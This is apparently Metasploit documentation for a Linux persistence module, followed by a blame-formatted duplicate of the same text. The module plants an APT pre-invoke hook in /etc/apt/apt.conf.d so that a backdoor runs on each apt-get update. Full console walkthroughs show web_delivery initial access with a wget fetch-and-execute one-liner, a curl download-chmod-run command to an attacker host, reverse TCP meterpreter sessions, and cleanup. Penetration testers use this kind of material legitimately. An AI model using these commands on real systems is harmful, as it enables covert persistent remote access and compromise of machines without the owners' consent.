documentation/modules/exploit/linux/persistence/apt_package_manager.md

## Vulnerable Application

This module will run a payload when the apt package manager is used.
This module creates a pre-invoke hook for APT in `apt.conf.d`.
The hook name syntax is numeric followed by text.

Verified on Ubuntu 22.04

## Verification Steps

1. Exploit a box that uses APT
2. Obtain root persmissions, or enough permissions to edit the `apt.conf.d` folder
3. `use exploit/linux/persistence/apt_package_manager`
4. `set SESSION <id>`
5. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
6. `exploit`

When the system runs `apt-get update` the payload will launch.

## Options

### PAYLOAD_NAME

Name of backdoor executable. Defaults to a random name

### HOOKNAME

Name of pre-invoke hook to be installed in `/etc/apt/apt.conf.d/`. Pre-invoke hook name syntax is numeric followed by text.

## Scenarios

### Tested on Ubuntu 22.04

Initial access vector via web delivery

```
$ ./msfconsole -q
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545 
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Z73D1DUW --no-check-certificate http://111.111.1.111:8181/l; chmod +x Z73D1DUW; ./Z73D1DUW& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
[*] 222.222.2.22     web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.22:51076) at 2025-02-04 17:40:52 -0500
sessions -l
Active sessions
===============
  Id  Name  Type                   Information          Connection
  --  ----  ----                   -----------          ----------
  1         meterpreter x64/linux  root @ 222.222.2.22  111.111.1.111:4545 -> 222.222.2.22:51076 (222.222.2.22)
```

Persistence

```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/apt_package_manager 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > check
[*] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > exploit
[*] Command to run on remote host: curl -so ./xTOLdQoOTv http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./xTOLdQoOTv;./xTOLdQoOTv&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > 
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
[*] Attempting to write hook:
[*] Wrote /etc/apt/apt.conf.d/76skoGqswo
[*] Backdoor uploaded /tmp/erNOJV96u
[+] Backdoor will run on next APT update
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > jobs
Jobs
====
  Id  Name                                            Payload                                     Payload opts
  --  ----                                            -------                                     ------------
  0   Exploit: multi/script/web_delivery              linux/x64/meterpreter/reverse_tcp           tcp://111.111.1.111:4545
  1   Exploit: linux/persistence/apt_package_manager  cmd/linux/http/x64/meterpreter/reverse_tcp  tcp://111.111.1.111:4444
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > 
```

Run `sudo apt-get update` on the target.

```
[*] Client 222.222.2.22 requested /Hg3DGEu9GqlWD06kh4AzFg
[*] Sending payload to 222.222.2.22 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:49804) at 2025-02-04 17:43:06 -0500
[msf](Jobs:2 Agents:2) exploit(linux/persistence/apt_package_manager) > sessions -i 2
[*] Starting interaction with 2...
(Meterpreter 2)(/tmp) > sysinfo
Computer     : 222.222.2.22
OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 2)(/tmp) > 
```

#### Cleanup

```
(Meterpreter 2)(/tmp) > resource /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc
[*] Processing /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc for ERB directives.
resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /etc/apt/apt.conf.d/76skoGqswo
resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /tmp/erNOJV96u
```
update apt_package_manager to persistence mixin 2025-08-24 08:21:46 -04:00			`## Vulnerable Application`

			`This module will run a payload when the apt package manager is used.`
			This module creates a pre-invoke hook for APT in `apt.conf.d`.
			`The hook name syntax is numeric followed by text.`

			`Verified on Ubuntu 22.04`

			`## Verification Steps`

			`1. Exploit a box that uses APT`
			2. Obtain root persmissions, or enough permissions to edit the `apt.conf.d` folder
			3. `use exploit/linux/persistence/apt_package_manager`
			4. `set SESSION <id>`
			5. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
			6. `exploit`

			When the system runs `apt-get update` the payload will launch.

			`## Options`

			`### PAYLOAD_NAME`

			`Name of backdoor executable. Defaults to a random name`

			`### HOOKNAME`

			Name of pre-invoke hook to be installed in `/etc/apt/apt.conf.d/`. Pre-invoke hook name syntax is numeric followed by text.

			`## Scenarios`

			`### Tested on Ubuntu 22.04`

			`Initial access vector via web delivery`

			```
			`$ ./msfconsole -q`
			`[*] Processing /root/.msf4/msfconsole.rc for ERB directives.`
			`resource (/root/.msf4/msfconsole.rc)> setg verbose true`
			`verbose => true`
			`resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111`
			`lhost => 111.111.1.111`
			`resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery`
			`[*] Using configured payload python/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> set srvport 8181`
			`srvport => 8181`
			`resource (/root/.msf4/msfconsole.rc)> set target 7`
			`target => 7`
			`resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp`
			`payload => linux/x64/meterpreter/reverse_tcp`
			`resource (/root/.msf4/msfconsole.rc)> set lport 4545`
			`lport => 4545`
			`resource (/root/.msf4/msfconsole.rc)> set URIPATH l`
			`URIPATH => l`
			`resource (/root/.msf4/msfconsole.rc)> run`
			`[*] Exploit running as background job 0.`
			`[*] Exploit completed, but no session was created.`
			`[*] Starting persistent handler(s)...`
			`[*] Started reverse TCP handler on 111.111.1.111:4545`
			`[*] Using URL: http://111.111.1.111:8181/l`
			`[*] Server started.`
			`[*] Run the following command on the target machine:`
			`wget -qO Z73D1DUW --no-check-certificate http://111.111.1.111:8181/l; chmod +x Z73D1DUW; ./Z73D1DUW& disown`
			`[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >`
			`[*] 222.222.2.22 web_delivery - Delivering Payload (250 bytes)`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3045380 bytes) to 222.222.2.22`
			`[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.22:51076) at 2025-02-04 17:40:52 -0500`
			`sessions -l`
			`Active sessions`
			`===============`
			`Id Name Type Information Connection`
			`-- ---- ---- ----------- ----------`
			`1 meterpreter x64/linux root @ 222.222.2.22 111.111.1.111:4545 -> 222.222.2.22:51076 (222.222.2.22)`
			```

			`Persistence`

			```
			`[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/apt_package_manager`
			`[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp`
			`[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > set session 1`
			`session => 1`
			`[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > check`
			`[*] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.`
			`[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > exploit`
			`[*] Command to run on remote host: curl -so ./xTOLdQoOTv http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./xTOLdQoOTv;./xTOLdQoOTv&`
			`[*] Exploit running as background job 1.`
			`[*] Exploit completed, but no session was created.`
			`[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) >`
			`[*] Fetch handler listening on 111.111.1.111:8080`
			`[*] HTTP server started`
			`[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg`
			`[*] Started reverse TCP handler on 111.111.1.111:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.`
			`[*] Attempting to write hook:`
			`[*] Wrote /etc/apt/apt.conf.d/76skoGqswo`
			`[*] Backdoor uploaded /tmp/erNOJV96u`
			`[+] Backdoor will run on next APT update`
			`[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc`
			`[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > jobs`
			`Jobs`
			`====`
			`Id Name Payload Payload opts`
			`-- ---- ------- ------------`
			`0 Exploit: multi/script/web_delivery linux/x64/meterpreter/reverse_tcp tcp://111.111.1.111:4545`
			`1 Exploit: linux/persistence/apt_package_manager cmd/linux/http/x64/meterpreter/reverse_tcp tcp://111.111.1.111:4444`
			`[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) >`
			```

			Run `sudo apt-get update` on the target.

			```
			`[*] Client 222.222.2.22 requested /Hg3DGEu9GqlWD06kh4AzFg`
			`[*] Sending payload to 222.222.2.22 (curl/7.81.0)`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3045380 bytes) to 222.222.2.22`
			`[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:49804) at 2025-02-04 17:43:06 -0500`
			`[msf](Jobs:2 Agents:2) exploit(linux/persistence/apt_package_manager) > sessions -i 2`
			`[*] Starting interaction with 2...`
			`(Meterpreter 2)(/tmp) > sysinfo`
			`Computer : 222.222.2.22`
			`OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)`
			`Architecture : x64`
			`BuildTuple : x86_64-linux-musl`
			`Meterpreter : x64/linux`
			`(Meterpreter 2)(/tmp) >`
			```

			`#### Cleanup`

			```
			`(Meterpreter 2)(/tmp) > resource /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc`
			`[*] Processing /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc for ERB directives.`
			`resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /etc/apt/apt.conf.d/76skoGqswo`
			`resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /tmp/erNOJV96u`
			```